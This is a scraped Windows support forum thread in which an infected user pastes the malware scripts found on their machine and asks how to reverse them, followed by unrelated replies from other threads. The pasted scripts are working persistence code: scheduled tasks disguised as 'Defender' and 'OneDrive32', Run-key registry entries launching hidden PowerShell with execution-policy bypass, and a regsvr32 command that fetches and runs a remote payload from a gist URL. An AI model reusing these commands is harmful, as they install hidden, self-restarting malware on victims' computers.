Windows 10: How to reverse what a virus changed and stop it from opening in startup.

Discus and support How to reverse what a virus changed and stop it from opening in startup. in AntiVirus, Firewalls and System Security to solve the problem; After getting stressed because a virus didnt stopped to open a cmd every time i closed it i started checking the files from the program that installed... Discussion in 'AntiVirus, Firewalls and System Security' started by Zerlingg, Jun 18, 2019.

  1. Zerlingg Win User

    How to reverse what a virus changed and stop it from opening in startup.


    After getting stressed because a virus didnt stopped to open a cmd every time i closed it i started checking the files from the program that installed it (because no antivirus has fixed this How to reverse what a virus changed and stop it from opening in startup. :( ) and then found this things:


    first thing that opens is a launcher.bat that gets open when tryng to run the program, and this is what it does:

    cd .. && cd data && cd source && cd data1 && cd data2

    xcopy /s /Y data3 C:\Users\Public\Music /E /H

    cd data3 && cd bin

    schtasks /create /tn "OneDrive32" /tr "cmd /c start /min C:\Users\Public\Music\bin\java.bat" /sc minute /mo 2 /F

    schtasks /create /tn "WindowsPhotos" /tr "cmd /c start /min C:\Users\Public\Music\bin\ghost.exe" /sc minute /mo 33 /F

    schtasks /create /tn "Defender" /tr "regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll" /sc minute /mo 32 /F

    wscript.exe service.vbs && wscript.exe java.vbs

    start ghost.exe

    attrib +h C:\Users\Public\Music

    exit



    It changes "Defender", "WindowsPhotos" and "OneDrive32". Also it starts running that "ghost.exe", and install other things like a code from github. I want to revert all of this so it stops the virus and cmds, and also, let me show you other files i found at C:\Users\Public\Music\bin\ directory that it hides (thankfully i found all of this because i always have the hidden files not hidden).


    java.vbs runs:

    const CONSOLE_HIDE=0

    const CONSOLE_SHOW=1

    const CMD_WAIT=true



    set O = CreateObject("Wscript.Shell")

    D="HKCU\jaava"

    H="cmd /c start /min C:\Users\Public\Music\bin\java.bat"

    O.regwrite D,H,"REG_SZ"

    O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cleaner", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34) , "REG_SZ"

    O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34),0,false



    I took a look at Java.bat too:

    cd C:\Users\Public\Music\bin && start /min jjs.bat && exit


    And jjs.bat:

    echo eval(new java.lang.String(java.util.Base64.decoder.decode(' '))); | powershell.exe -WindowStyle Hidden C:\Users\Public\Music\bin\svchost.exe


    (inside the (' ') goes a really long text of random leters and numbers, but i dont want to put it, i dont think it will help in anything)



    I also checked Service.vbs:


    const CONSOLE_HIDE=0

    const CONSOLE_SHOW=1

    const CMD_WAIT=true



    set O = CreateObject("Wscript.Shell")

    D="HKCU\alien34"

    H="regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll"

    O.regwrite D,H,"REG_SZ"

    O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive32", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34) , "REG_SZ"

    O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34),0,false



    If you need anything else to check just tell me, i will post in a comment if i find more things

    :)
     
    Zerlingg, Jun 18, 2019
    #1

  2. Virus change reversal

    I got some sort of virus on Tuesday. I ran a few virus scanners in safe mode and they caught about 14 different bugs/registry hacks so I think it's all quarantined. One of the changes the virus(es) did was that every file and folder is set as "hidden". Is there a registry setting I can change to fix this?
     
    demonbrawn, Jun 18, 2019
    #2
  3. Avedis53 Win User
    Can't get GPU-Z to start with Windows 8.1 startup

    I'm not sure how to do that. Could you list the steps for a noob?
     
    Avedis53, Jun 18, 2019
    #3
  4. How to reverse what a virus changed and stop it from opening in startup.

    OneNote 2016 opening on startup

    Hi,

    In order to turn off or disable OneNote 2016 at startup, we suggest that you follow the steps below:

    • Right-click on the Taskbar, and select Task Manager.
    • On the bottom right of the Task Manager window, click the drop-down arrow to open
      More details.
    • Click the Startup tab. This tab shows the programs that are enabled on Startup.
    • Right-click OneNote 2016, and click Disable.
    • Click File, then Exit.
    • You may then restart your computer for the changes to take effect.

    Let us know if you need further help.

    Regards.
     
    Vanessa Yar, Jun 18, 2019
    #4
Thema:

How to reverse what a virus changed and stop it from opening in startup.

Loading...
  1. How to reverse what a virus changed and stop it from opening in startup. - Similar Threads - reverse virus changed

  2. Is there a way to stop Chrome from opening on startup without unchecking "open where you...

    in Windows 10 Customization
    Is there a way to stop Chrome from opening on startup without unchecking "open where you...: I very much like continuing my old sessions as i allways keep handy tabs open, but chrome opening on startup is extremley bothersome as it lags and slows down my computer when all the other apps are activating. so far ive already tried all the other options i could find and...
  3. boot sequence changed automatically how to reverse it

    in Windows 10 Customization
    boot sequence changed automatically how to reverse it: i have dell 15R 5520 laptop with windows 10. Day before yesterday when i started my laptop it showed pxe over ipv4 and pxe over ipv6 during boot. I pressed esc from it and my pc started i checked my boot order and found it was changed and now windows boot manager is listed at...
  4. How do i know what was changed on my computer from a virus?

    in AntiVirus, Firewalls and System Security
    How do i know what was changed on my computer from a virus?: I was downloading some stuff on windows version 8.1 and decided to face check the file with no anti-virus (nice), got ambushed with a virus who disabled Windows Defender and started doing some whack things in the background. I quickly managed to install malwarebytes and got...
  5. How to stop a txt file from auto opening at login (Not at startup)

    in Windows 10 Support
    How to stop a txt file from auto opening at login (Not at startup): I had a txt file that I set to open during login. I'm most sure that it loaded at login, not startup. I have since deleted the file and cannot find where to stop the error that i get during login ("Can't find txt file"). I'm aware of the startup folder that contains the files...
  6. How to determine what is stopping an software from launching

    in Windows 10 Software and Apps
    How to determine what is stopping an software from launching: Hi guys! I hope this is the right thread. I recently had a problem with my CS:GO not launching from Steam. I tried uninstalling the game and restoring a backup copy from my laptop (which runs it) to still no avail. I tried reinstalling Steam downloading CS:GO again but it...
  7. How to stop Bing Virus?

    in Browsers and Email
    How to stop Bing Virus?: Anyone know how to stop Bing from coming back into the Favorites? It is like a virus you can't get rid of. I am sick of deleting it and just want gone for good 91047
  8. How to stop autologon at startup

    in User Accounts and Family Safety
    How to stop autologon at startup: What is the key combination to stop autologon on windows 10 at startup to access a different user. For windows 7, it was shift, but I don't know the key combination for win 10. 59344
  9. How to stop insert disk window that opens on startup

    in Windows 10 Drivers and Hardware
    How to stop insert disk window that opens on startup: Cannot figure out how to stop this window from displaying on start up. (pic attached) Any help will be appreciated. 56334
  10. How Stop Folder Settings From Changing?

    in Windows 10 Support
    How Stop Folder Settings From Changing?: Is there a registry fix to keep folder settings from changing? This is a really irritating problem. I tried everything, including suggestions. So I was wondering if someone came up with a reg fix. Thanks in advance ~ Sean. 69196